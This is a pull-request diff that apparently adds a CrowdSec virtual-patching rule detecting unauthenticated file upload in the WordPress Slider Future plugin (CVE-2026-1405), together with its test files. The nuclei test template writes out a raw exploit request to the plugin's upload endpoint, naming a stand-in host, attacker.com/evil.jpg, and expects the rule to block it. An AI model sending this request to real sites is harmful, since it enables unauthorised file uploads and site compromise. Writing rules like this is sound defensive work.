Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
21 changes: 21 additions & 0 deletions .appsec-tests/vpatch-CVE-2026-1405/CVE-2026-1405.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
## autogenerated on 2026-04-01 13:14:53
id: CVE-2026-1405
info:
name: CVE-2026-1405
author: crowdsec
severity: info
description: CVE-2026-1405 testing
tags: appsec-testing
http:
- raw:
- |
POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"image_url":"http://attacker.com/evil.jpg"}
cookie-reuse: true
matchers:
- type: status
status:
- 403
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2026-1405/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
## autogenerated on 2026-04-01 13:14:53
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml
nuclei_template: CVE-2026-1405.yaml
34 changes: 34 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2026-1405.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
## autogenerated on 2026-04-01 13:14:53
name: crowdsecurity/vpatch-CVE-2026-1405
description: 'Detects unauthenticated arbitrary file upload in WordPress Slider Future plugin <= 1.0.5 via /wp-json/slider-future/v1/upload-image/'
rules:
- and:
- zones:
- URI
transform:
- lowercase
match:
type: contains
value: /wp-json/slider-future/v1/upload-image/
- zones:
- BODY_ARGS
variables:
- json.image_url
transform:
- lowercase
- urldecode
match:
type: contains
value: http

labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: 'http:exploit'
label: 'WordPress Slider Future - File Upload'
classification:
- cve.CVE-2026-1405
- attack.T1190
- cwe.CWE-434
1 change: 1 addition & 0 deletions collections/crowdsecurity/appsec-virtual-patching.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -116,6 +116,7 @@ appsec-rules:
- crowdsecurity/vpatch-CVE-2025-49113
- crowdsecurity/appsec-generic-test
- crowdsecurity/vpatch-CVE-2025-25257
- crowdsecurity/vpatch-CVE-2026-1405
- crowdsecurity/vpatch-CVE-2019-5418
- crowdsecurity/vpatch-CVE-2025-52488
- crowdsecurity/vpatch-CVE-2025-49132
Expand Down
Loading